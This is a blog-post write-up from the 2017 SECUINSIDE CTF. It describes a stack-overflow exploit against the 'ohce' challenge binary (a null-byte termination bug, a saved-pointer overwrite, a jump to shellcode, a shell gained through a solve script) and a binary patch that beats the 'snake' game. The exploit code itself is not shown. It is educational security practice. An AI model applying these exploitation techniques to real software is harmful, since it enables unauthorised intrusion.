20170701_SECUINSIDECTF Writeup

20170701_SECUINSIDECTF Writeup

Yesterday and today, I joined in 20170701_SECUINSIDECTF. There were many difficult problems, and unsolved one.

Fortunately, I could solve 2problem, OHCE and SNAKE. I wrote my solution below.

OHCE pwn


This is Stack base overflow chall. This process as below.


– First print menu, and I can choose 1. echo 2, reverse echo, 3.exit

– if choose 1, I can type something, and return echo

– if choose 2, I can type something, and return reverse string I typed

– if choose 3, exit program


Let’s analyze it. And realize that this don’t have any protection,


$ checksec ohce
[*] ‘/mnt/hgfs/VM-Share/20170701_SECUINSIDECTF/ohce/ohce’
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE


Next, I continue to execute it, several minutes, I find out that there is Null Byte Termination Vulnerability.

If I input 31+32*n chars in echo mode, next data is leaked. And when I input it in reverse echo, program is halted.

1. echo
2. echo(Reverse)
3. Exit
> 1
1. echo
2. echo(Reverse)
3. Exit
> 2
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaSegmentation fault (core dumped)


What’s happened? Below picuture show that stack information when input 31+32*n chars.

(In this picture unfortunately data of 0x7fffffffdae0 is 00, so this leak don’t occurred…)



Then reverse echo, because of Null Byte Termination Vulnerability, I can overwrite next address.

Finally overwritten address become esp in [0x400268 mov rsp,rbp], I can got rip.


Exploitation is below.

– First leak stack address to write 31 chars in echo

– Next write many chars and stack address to go to shellscript (address in red rectangle) in echo

– Write shellscript and stack address to go to below address (address in light blue rectangle) in reverse echo.



$ python solve_ohce.py
[+] Opening connection to on port 8888: Done
\x001. echo
2. echo(Reverse)
3. Exit\x00
\x00 >
[*] Switching to interactive mode
$ ls
$ cat flag
[*] Got EOF while reading in interactive



This is the old snake game program.

Several hours investigation, I recognize that this algorithm is as below. (function name is named by me.)



This program calculate enc_flag and xor-ed another data in clear_game function.

At first, I tried to make script to make those data, but I can’t do this. So I change my direction as below.


– I patch program to return true on if(judge_goal) statement.




– I patch program not to change time_duration.



Then execute it, After several minutes, I can get flag. (You must control snake not to crash to wall until getting flag.)





Patched program:



Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s